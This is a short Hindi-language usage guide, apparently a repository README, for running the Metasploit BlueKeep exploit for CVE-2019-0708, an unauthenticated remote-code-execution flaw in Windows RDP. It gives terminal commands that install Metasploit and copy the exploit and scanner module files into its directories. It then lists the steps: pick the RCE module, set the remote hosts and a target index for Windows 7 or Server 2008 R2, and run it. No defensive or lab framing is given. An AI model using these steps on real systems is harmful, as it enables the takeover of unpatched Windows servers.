CVE-2019-0708
CVE-2019-0708 मेटास्प्लॉइट-फ्रेमवर्क के साथ
CVE-2019-0708 एक भेद्यता है जो उपयोगकर्ता प्रमाणीकरण की जांच के माध्यम से प्रमाणीकरण को बायपास करने की अनुमति देती है, बिना किसी इंटरैक्शन के, सीधे RDP प्रोटोकॉल के माध्यम से कनेक्ट करके सर्वर पर दुर्भावनापूर्ण कोड भेज सकती है। यदि हमलावर द्वारा इसका उपयोग किया जाता है, तो यह सर्वर की घुसपैठ, वायरस संक्रमण का कारण बन सकता है, जैसे WannaCry और EternalBlue भेद्यता द्वारा बड़े पैमाने पर संक्रमण हुआ था।
7 सितंबर 2019 को रात 1 बजे के आसपास, मेटास्प्लॉइट ने एक शोषण प्रोग्राम अपडेट किया।
उपयोग:
0x01 पर्यावरण सेटअप
टर्मिनल में निष्पादित करें
apt install metasploit-framework
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
0x02 संचालन विधि
1. windwos/rdp/cve_2019_0708_bluekeep_rce मॉड्यूल का उपयोग करें
2. RHOSTS और टार्गेट सेट करें (यदि लक्ष्य मशीन VMWare है तो टार्गेट 3 सेट करें)
0 Automatic targeting via fingerprinting
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
3. एक्सप्लॉइट चलाएं